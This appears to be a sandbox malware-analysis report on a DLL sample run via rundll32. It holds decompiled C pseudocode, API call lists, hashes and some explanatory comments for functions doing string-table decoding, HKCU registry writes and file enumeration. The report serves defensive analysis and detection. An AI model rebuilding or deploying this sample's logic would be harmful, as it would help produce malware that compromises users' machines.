                                                  • Instruction ID: 021a7a1e94eca5a03a840f6d666b101dfc79b9ab95db5ec1b6901b0f3532aa33
                                                  • Opcode Fuzzy Hash: f28a9215a9a1f248030c4780d559eeef4d7e06867064dcf1b16b260ee4c1cccd
                                                  • Instruction Fuzzy Hash: 7C213EB590025DFFEB119FA4EC84DEEBFB9EB84304F000065E511A6154DB755E45EB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 57%
                                                  			E04F4225B(signed int __edx) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				CHAR* _v16;
                                                  				long _v20;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				CHAR* _t22;
                                                  				CHAR* _t25;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				CHAR* _t36;
                                                  				CHAR* _t42;
                                                  				CHAR* _t43;
                                                  				CHAR* _t44;
                                                  				CHAR* _t46;
                                                  				void* _t49;
                                                  				void* _t51;
                                                  				CHAR* _t54;
                                                  				signed char _t56;
                                                  				intOrPtr _t58;
                                                  				signed int _t59;
                                                  				void* _t62;
                                                  				CHAR* _t65;
                                                  				CHAR* _t66;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  
                                                  				_t61 = __edx;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_t21 = E04F4550E();
                                                  				if(_t21 != 0) {
                                                  					_t59 =  *0x4f4d25c; // 0x4000000a
                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                  					 *0x4f4d25c = (_t59 & 0xf0000000) + _t21;
                                                  				}
                                                  				_t22 =  *0x4f4d164(0, 2); // executed
                                                  				_v16 = _t22;
                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                  					_t25 = E04F43D0D( &_v8,  &_v20); // executed
                                                  					_t54 = _t25;
                                                  					_t26 =  *0x4f4d27c; // 0x212a5a8
                                                  					if( *0x4f4d25c > 5) {
                                                  						_t8 = _t26 + 0x4f4e5cd; // 0x4d283a53
                                                  						_t27 = _t8;
                                                  					} else {
                                                  						_t7 = _t26 + 0x4f4ea15; // 0x44283a44
                                                  						_t27 = _t7;
                                                  					}
                                                  					E04F41BF4(_t27, _t27);
                                                  					_t31 = E04F41B2F(_t61,  &_v20,  &_v12); // executed
                                                  					if(_t31 == 0) {
                                                  						CloseHandle(_v20);
                                                  					}
                                                  					_t62 = 5;
                                                  					if(_t54 != _t62) {
                                                  						 *0x4f4d270 =  *0x4f4d270 ^ 0x81bbe65d;
                                                  						_t32 = E04F42049(0x60);
                                                  						__eflags = _t32;
                                                  						 *0x4f4d32c = _t32;
                                                  						if(_t32 == 0) {
                                                  							_push(8);
                                                  							_pop(0);
                                                  						} else {
                                                  							memset(_t32, 0, 0x60);
                                                  							_t49 =  *0x4f4d32c; // 0x70795b0
                                                  							_t68 = _t68 + 0xc;
                                                  							__imp__(_t49 + 0x40);
                                                  							_t51 =  *0x4f4d32c; // 0x70795b0
                                                  							 *_t51 = 0x4f4e836;
                                                  						}
                                                  						__eflags = 0;
                                                  						_t54 = 0;
                                                  						if(0 == 0) {
                                                  							_t36 = RtlAllocateHeap( *0x4f4d238, 0, 0x43);
                                                  							__eflags = _t36;
                                                  							 *0x4f4d2c4 = _t36;
                                                  							if(_t36 == 0) {
                                                  								_push(8);
                                                  								_pop(0);
                                                  							} else {
                                                  								_t56 =  *0x4f4d25c; // 0x4000000a
                                                  								_t61 = _t56 & 0x000000ff;
                                                  								_t58 =  *0x4f4d27c; // 0x212a5a8
                                                  								_t13 = _t58 + 0x4f4e55a; // 0x697a6f4d
                                                  								_t55 = _t13;
                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4f4c2a7);
                                                  							}
                                                  							__eflags = 0;
                                                  							_t54 = 0;
                                                  							if(0 == 0) {
                                                  								asm("sbb eax, eax");
                                                  								E04F4269C( ~_v8 &  *0x4f4d270, 0x4f4d00c); // executed
                                                  								_t42 = E04F44094(_t55); // executed
                                                  								_t54 = _t42;
                                                  								__eflags = _t54;
                                                  								if(_t54 != 0) {
                                                  									goto L30;
                                                  								}
                                                  								_t43 = E04F496A4(_t55); // executed
                                                  								__eflags = _t43;
                                                  								if(_t43 != 0) {
                                                  									__eflags = _v8;
                                                  									_t65 = _v12;
                                                  									if(_v8 != 0) {
                                                  										L29:
                                                  										_t44 = E04F46786(_t61, _t65, _v8); // executed
                                                  										_t54 = _t44;
                                                  										goto L30;
                                                  									}
                                                  									__eflags = _t65;
                                                  									if(__eflags == 0) {
                                                  										goto L30;
                                                  									}
                                                  									_t46 = E04F43DD9(__eflags,  &(_t65[4])); // executed
                                                  									_t54 = _t46;
                                                  									__eflags = _t54;
                                                  									if(_t54 == 0) {
                                                  										goto L30;
                                                  									}
                                                  									goto L29;
                                                  								}
                                                  								_t54 = 8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t66 = _v12;
                                                  						if(_t66 == 0) {
                                                  							L30:
                                                  							if(_v16 == 0 || _v16 == 1) {
                                                  								 *0x4f4d160();
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_t67 =  &(_t66[4]);
                                                  						do {
                                                  						} while (E04F4A501(_t62, _t67, 0, 1) == 0x4c7);
                                                  					}
                                                  					goto L30;
                                                  				} else {
                                                  					_t54 = _t22;
                                                  					L34:
                                                  					return _t54;
                                                  				}
                                                  			}
                                                  0x04f42435
                                                  0x04f42435

                                                  APIs
                                                    • Part of subcall function 04F4550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,04F42274,00000000,00000000), ref: 04F4551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04F422F1
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • memset.NTDLL ref: 04F42340
                                                  • RtlInitializeCriticalSection.NTDLL(07079570), ref: 04F42351
                                                    • Part of subcall function 04F43DD9: memset.NTDLL ref: 04F43DEE
                                                    • Part of subcall function 04F43DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04F43E22
                                                    • Part of subcall function 04F43DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04F43E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04F4237C
                                                  • wsprintfA.USER32 ref: 04F423AC
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 9e73710df37c57f4f52c1614d42451a906916b52af368c92de1e442a509f49de
                                                  • Instruction ID: bd105692c20aa648ff41513ae3fbf9206ca728eb9fe02b6f5b0cbf9923a1b0e6
                                                  • Opcode Fuzzy Hash: 9e73710df37c57f4f52c1614d42451a906916b52af368c92de1e442a509f49de
                                                  • Instruction Fuzzy Hash: 6D51D575F00218ABEB209BA4EC48A6E3FB8EBC4784F0144B5F501D7141EF78EA468B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 202 4f494a9-4f494bc 203 4f494c3-4f494c7 StrChrA 202->203 204 4f494be-4f494c2 203->204 205 4f494c9-4f494da call 4f42049 203->205 204->203 208 4f494dc-4f494e8 StrTrimA 205->208 209 4f4951f 205->209 210 4f494ea-4f494f3 StrChrA 208->210 211 4f49521-4f49528 209->211 212 4f49505-4f49511 210->212 213 4f494f5-4f494ff StrTrimA 210->213 212->210 214 4f49513-4f4951d 212->214 213->212 214->211
                                                  C-Code - Quality: 53%
                                                  			E04F494A9(char* __eax) {
                                                  				char* _t8;
                                                  				intOrPtr _t12;
                                                  				char* _t21;
                                                  				signed int _t23;
                                                  				char* _t24;
                                                  				signed int _t26;
                                                  				void* _t27;
                                                  
                                                  				_t21 = __eax;
                                                  				_push(0x20);
                                                  				_t23 = 1;
                                                  				_push(__eax);
                                                  				while(1) {
                                                  					_t8 = StrChrA();
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_t23 = _t23 + 1;
                                                  					_push(0x20);
                                                  					_push( &(_t8[1]));
                                                  				}
                                                  				_t12 = E04F42049(_t23 << 2);
                                                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                  				if(_t12 != 0) {
                                                  					StrTrimA(_t21, 0x4f4c2a4); // executed
                                                  					_t26 = 0;
                                                  					do {
                                                  						_t24 = StrChrA(_t21, 0x20);
                                                  						if(_t24 != 0) {
                                                  							 *_t24 = 0;
                                                  							_t24 =  &(_t24[1]);
                                                  							StrTrimA(_t24, 0x4f4c2a4);
                                                  						}
                                                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                  						_t26 = _t26 + 1;
                                                  						_t21 = _t24;
                                                  					} while (_t24 != 0);
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                  				}
                                                  				return 0;
                                                  			}











                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,070795AC,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494C3
                                                  • StrTrimA.KERNELBASE(?,04F4C2A4,00000002,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494ED
                                                  • StrTrimA.SHLWAPI(00000001,04F4C2A4,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494FF
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: 68712fb1a75d3d05b5a07210ccafb900e28f737ba9ab89c15f3ca216a418e706
                                                  • Instruction ID: f787c99602af99cd367c4b57ce8a4d29bf6208677194088dab536c19dc674f68
                                                  • Opcode Fuzzy Hash: 68712fb1a75d3d05b5a07210ccafb900e28f737ba9ab89c15f3ca216a418e706
                                                  • Instruction Fuzzy Hash: 6F01B5B1B053255FD3319E69DC49F2B7ED8EBD6690F121519F841C7240DFA4D80286A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			E04F43DD9(void* __eflags, int _a4) {
                                                  				intOrPtr _v12;
                                                  				WCHAR* _v16;
                                                  				char* _v20;
                                                  				int _v24;
                                                  				void* _v36;
                                                  				char _v40;
                                                  				char _v68;
                                                  				char _v72;
                                                  				char _v76;
                                                  				char _v80;
                                                  				void _v84;
                                                  				char _v88;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				intOrPtr _t40;
                                                  				int _t45;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t52;
                                                  				void* _t55;
                                                  				intOrPtr _t67;
                                                  				void* _t70;
                                                  				void* _t80;
                                                  				WCHAR* _t85;
                                                  
                                                  				_v88 = 0;
                                                  				memset( &_v84, 0, 0x2c);
                                                  				_v40 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t40 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t5 = _t40 + 0x4f4ee40; // 0x410025
                                                  				_t85 = E04F46A12(_t5);
                                                  				_v16 = _t85;
                                                  				if(_t85 == 0) {
                                                  					_t80 = 8;
                                                  					L24:
                                                  					return _t80;
                                                  				}
                                                  				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                  				if(_t45 != 0) {
                                                  					_t80 = 1;
                                                  					L22:
                                                  					E04F49039(_v16);
                                                  					goto L24;
                                                  				}
                                                  				if(E04F4A72D(0,  &_a4) != 0) {
                                                  					_a4 = 0;
                                                  				}
                                                  				_t50 = E04F4809F(0,  *0x4f4d33c);
                                                  				_v12 = _t50;
                                                  				if(_t50 == 0) {
                                                  					_t80 = 8;
                                                  					goto L19;
                                                  				} else {
                                                  					_t52 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t11 = _t52 + 0x4f4e81a; // 0x65696c43
                                                  					_t55 = E04F4809F(0, _t11);
                                                  					_t87 = _t55;
                                                  					if(_t55 == 0) {
                                                  						_t80 = 8;
                                                  					} else {
                                                  						_t80 = E04F46BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                  						E04F49039(_t87);
                                                  					}
                                                  					if(_t80 != 0) {
                                                  						L17:
                                                  						E04F49039(_v12);
                                                  						L19:
                                                  						_t86 = _a4;
                                                  						if(_a4 != 0) {
                                                  							E04F41F99(_t86);
                                                  						}
                                                  						goto L22;
                                                  					} else {
                                                  						if(( *0x4f4d260 & 0x00000001) == 0) {
                                                  							L14:
                                                  							E04F48F83(_t80, _v88, _v84,  *0x4f4d270, 0);
                                                  							_t80 = E04F41C74(_v88,  &_v80,  &_v76, 0);
                                                  							if(_t80 == 0) {
                                                  								_v24 = _a4;
                                                  								_v20 =  &_v88;
                                                  								_t80 = E04F442EA( &_v40, 0);
                                                  							}
                                                  							E04F49039(_v88);
                                                  							goto L17;
                                                  						}
                                                  						_t67 =  *0x4f4d27c; // 0x212a5a8
                                                  						_t18 = _t67 + 0x4f4e823; // 0x65696c43
                                                  						_t70 = E04F4809F(0, _t18);
                                                  						_t89 = _t70;
                                                  						if(_t70 == 0) {
                                                  							_t80 = 8;
                                                  						} else {
                                                  							_t80 = E04F46BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                  							E04F49039(_t89);
                                                  						}
                                                  						if(_t80 != 0) {
                                                  							goto L17;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  					}
                                                  				}
                                                  			}



























                                                  APIs
                                                  • memset.NTDLL ref: 04F43DEE
                                                    • Part of subcall function 04F46A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F43E14,00410025,00000005,?,00000000), ref: 04F46A23
                                                    • Part of subcall function 04F46A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04F46A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04F43E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04F43E2D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: 7601f74ae4d9a7b6b266c067a2cddea34b4d0ec845ea5d958b0a0d8e7f75aa94
                                                  • Instruction ID: 7ec6173e4a10c5113cc0c7ea6ee7cb13aa8fb80e5f6357ffba32a5a0526b7511
                                                  • Opcode Fuzzy Hash: 7601f74ae4d9a7b6b266c067a2cddea34b4d0ec845ea5d958b0a0d8e7f75aa94
                                                  • Instruction Fuzzy Hash: 34412276B01218AAEB21AFF4DC84DDE7FBCEF98754B004125E905E7110DE75EE468760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 271 4f48055-4f48060 272 4f48085-4f48092 InterlockedDecrement 271->272 273 4f48062-4f48063 271->273 275 4f48099-4f4809c 272->275 276 4f48094 call 4f4970f 272->276 274 4f48065-4f48072 InterlockedIncrement 273->274 273->275 274->275 277 4f48074-4f48078 call 4f46a56 274->277 276->275 280 4f4807d-4f4807f 277->280 280->275 281 4f48081-4f48083 280->281 281->275
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _t4;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t14;
                                                  
                                                  				_t14 = 1;
                                                  				_t4 = _a8;
                                                  				if(_t4 == 0) {
                                                  					if(InterlockedDecrement(0x4f4d23c) == 0) {
                                                  						E04F4970F();
                                                  					}
                                                  				} else {
                                                  					if(_t4 == 1 && InterlockedIncrement(0x4f4d23c) == 1) {
                                                  						_t10 = E04F46A56(_t11, _t12, _a4); // executed
                                                  						if(_t10 != 0) {
                                                  							_t14 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t14;
                                                  			}









                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(04F4D23C), ref: 04F4806A
                                                    • Part of subcall function 04F46A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F46A69
                                                  • InterlockedDecrement.KERNEL32(04F4D23C), ref: 04F4808A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 3232565453e3a7ded23a080f61a50b37a6aef375f3ecc543621a861a6667459e
                                                  • Instruction ID: a2a0b38c9068cfeadf04ee54ef1c2b54bea3366d141052a0b606816b5a50d9e8
                                                  • Opcode Fuzzy Hash: 3232565453e3a7ded23a080f61a50b37a6aef375f3ecc543621a861a6667459e
                                                  • Instruction Fuzzy Hash: B9E0DF7D76026193A3323B7CAC04B1ABE00EBC1BC0F068010F684C0050CE10E8538AF1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Rendered as an image in the original report (legend: Executed / Not Executed). Entry block 4f473fd-4f47410 calls 4f4a72d; later blocks call 4f41262, 4f47cb8, 4f489d6 (two call sites), 4f42659 and HeapFree (two sites); the optional call to 4f41f99 at 4f47504 leads to the exit block 4f47509-4f4750f.
                                                  C-Code - Quality: 87%
			/* Reading of E04F473FD (comments added for this listing, not decompiler
			   output): *0x4f4d27c is the base of the sample's string table and every
			   string operand below is base + offset. The decompiler annotates some of
			   these operands with the pointer value and others with the first DWORD at
			   that address; the latter decode little-endian to ASCII "IE10" (0x30314549)
			   and "IE8R" (0x52384549) and to UTF-16 L"SO" (0x4f0053) and L"Ch" (0x680043),
			   the rest of each string being off-page. The function obtains a context with
			   E04F4A72D, opens an object with E04F41262, sizes it through the function
			   pointer stored at 0x4f4d0f4, assembles a buffer with E04F47CB8/E04F489D6 and
			   passes it to E04F42659 together with 0x80000001 (HKEY_CURRENT_USER), so the
			   visible effect is a registry operation under HKCU. Results follow the Win32
			   error-code convention: 0 is success, 8 is ERROR_NOT_ENOUGH_MEMORY. */
			E04F473FD(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04F4A72D(0,  &_v8); // executed; obtains a context in _v8, cleared on failure
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4f4d27c; // 0x212a5a8: base of the string table
				_t4 = _t24 + 0x4f4ede0; // 0x7079388 (pointer value)
				_t5 = _t24 + 0x4f4ed88; // 0x4f0053: first DWORD of the string, UTF-16 L"SO"
				_t45 = E04F41262( &_v16, _v8, _t5, _t4); // opens the object named by the L"SO..." string; 0 = success
				if(_t45 == 0) {
					 *0x4f4d0f4(_v16, 0,  &_v12); // indirect call through a resolved function pointer: size query into _v12
					_t45 = 8; // ERROR_NOT_ENOUGH_MEMORY if the allocation below fails
					if(_v12 < _t45) {
						_t45 = 1; // error code 1 for a result shorter than 8 bytes
						__eflags = 1;
					} else {
						_t32 =  *0x4f4d27c; // 0x212a5a8
						_t11 = _t32 + 0x4f4edd4; // 0x707937c (pointer value)
						_t48 = _t11;
						_t12 = _t32 + 0x4f4ed88; // 0x4f0053: L"SO..." again
						_t55 = E04F47CB8(_t11, _t12, _t11); // builds the working buffer; NULL on failure
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x4f4d27c; // 0x212a5a8
							_t13 = _t35 + 0x4f4ee1e; // 0x30314549: "IE10..."
							if(E04F489D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) { // append the 0x14-byte string starting "IE10"
								_t61 =  *0x4f4d25c - 6;
								if( *0x4f4d25c <= 6) { // only when the global at 0x4f4d25c is 6 or less
									_t42 =  *0x4f4d27c; // 0x212a5a8
									_t15 = _t42 + 0x4f4ec2a; // 0x52384549: "IE8R..."
									E04F489D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13); // append the 0x13-byte string starting "IE8R"
								}
							}
							_t38 =  *0x4f4d27c; // 0x212a5a8
							_t17 = _t38 + 0x4f4ee18; // 0x70793c0 (pointer value)
							_t18 = _t38 + 0x4f4edf0; // 0x680043: UTF-16 L"Ch..."
							_t45 = E04F42659(_v8, 0x80000001, _t55, _t18, _t17); // 0x80000001 = HKEY_CURRENT_USER: registry operation with the buffer and the L"Ch..." name
							HeapFree( *0x4f4d238, 0, _t55); // heap handle kept in the global at 0x4f4d238
						}
					}
					HeapFree( *0x4f4d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04F41F99(_t54); // release the context obtained from E04F4A72D
				}
				return _t45;
			}

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070793C0,?,00000000,30314549,00000014,004F0053,0707937C), ref: 04F474E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F46814), ref: 04F474FB
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 469dda700d9f150dd76caa595d8ae3b850d6d0815f0331329eb89dc62e120c75
                                                  • Instruction ID: 14847bc738c9f8908e6ed724bc9114015bff9c7ced0ebaef2ae36253112097ad
                                                  • Opcode Fuzzy Hash: 469dda700d9f150dd76caa595d8ae3b850d6d0815f0331329eb89dc62e120c75
                                                  • Instruction Fuzzy Hash: C3316F76901108EFEB11EBA4EC44EAA7FFCEBD4744F154065E600A7160EF74AE46DB60
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Rendered as an image in the original report (legend: Executed / Not Executed). Entry block 4f421cd-4f421e0 calls 4f484d5; the loop body 4f421e5-4f42202 calls 4f412d4 and 4f4809f, with HeapFree at 4f42211-4f4221c on the failure path; after the loop, 4f42224-4f4222d calls 4f484d5 again and the function exits at 4f42252-4f42258.
                                                  C-Code - Quality: 70%
			/* Reading of E04F421CD (comments added for this listing, not decompiler
			   output): E04F484D5 is called with 0 before the loop and with 1 after it, and
			   its GetProcAddress call has the bytes "Wow6" (0x36776F57) on the stack, which
			   fits a Wow64 file-system-redirection toggle resolved by name. The loop runs
			   at most three times: E04F412D4 builds a path (CreateFileA, GetFileTime,
			   FindFirstFileA, lstrcat with 0x642E2A5C = "\*.d"), E04F4809F turns it into a
			   wide string (mbstowcs) and the result goes into the three-slot table at
			   0x4f4d330. If all three slots fill, the first character of the third slot
			   (*0x4f4d338) is upper-cased. Unlike the error-code functions in this listing,
			   this one returns 1 on success and 0 on failure. */
			E04F421CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0; // slot counter
				_push(0); // argument 0 for E04F484D5
				_t19 = 1; // result: assume success
				_t27 = 0x4f4d330; // output table of three wide-string pointers
				E04F484D5();
				while(1) {
					_t8 = E04F412D4(_a4,  &_v8); // executed; builds the next path into _v8
					if(_t8 == 0) {
						break; // nothing more to enumerate: failure path below
					}
					_push(_v8);
					_t14 = 0xd; // 13
					_t15 = E04F4809F(_t14); // narrow path -> wide string (mbstowcs)
					if(_t15 == 0) {
						HeapFree( *0x4f4d238, 0, _v8); // conversion failed: free the path and give up
						break;
					} else {
						 *_t27 = _t15; // store the wide string in the current slot
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue; // next slot
						} else {
						}
					}
					L7:
					_push(1); // argument 1 for E04F484D5, paired with the 0 above
					E04F484D5();
					if(_t19 != 0) {
						_t22 =  *0x4f4d338; // third slot
						_t11 =  *_t22 & 0x0000ffff; // its first wide character
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff; // not 'a'..'z': unchanged
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20; // to upper case
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0; // E04F412D4 or the conversion failed
				goto L7;
			}

                                                  APIs
                                                    • Part of subcall function 04F484D5: GetProcAddress.KERNEL32(36776F57,04F421E5), ref: 04F484F0
                                                    • Part of subcall function 04F412D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04F412FF
                                                    • Part of subcall function 04F412D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04F41321
                                                    • Part of subcall function 04F412D4: memset.NTDLL ref: 04F4133B
                                                    • Part of subcall function 04F412D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F41379
                                                    • Part of subcall function 04F412D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F4138D
                                                    • Part of subcall function 04F412D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 04F413A4
                                                    • Part of subcall function 04F412D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F413B0
                                                    • Part of subcall function 04F412D4: lstrcat.KERNEL32(?,642E2A5C), ref: 04F413F1
                                                    • Part of subcall function 04F412D4: FindFirstFileA.KERNELBASE(?,?), ref: 04F41407
                                                    • Part of subcall function 04F4809F: lstrlen.KERNEL32(?,00000000,04F4D330,00000001,04F42200,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9), ref: 04F480A8
                                                    • Part of subcall function 04F4809F: mbstowcs.NTDLL ref: 04F480CF
                                                    • Part of subcall function 04F4809F: memset.NTDLL ref: 04F480E1
                                                  • HeapFree.KERNEL32(00000000,04F4D00C,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9,04F4D00C,?,04F423E9), ref: 04F4221C
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
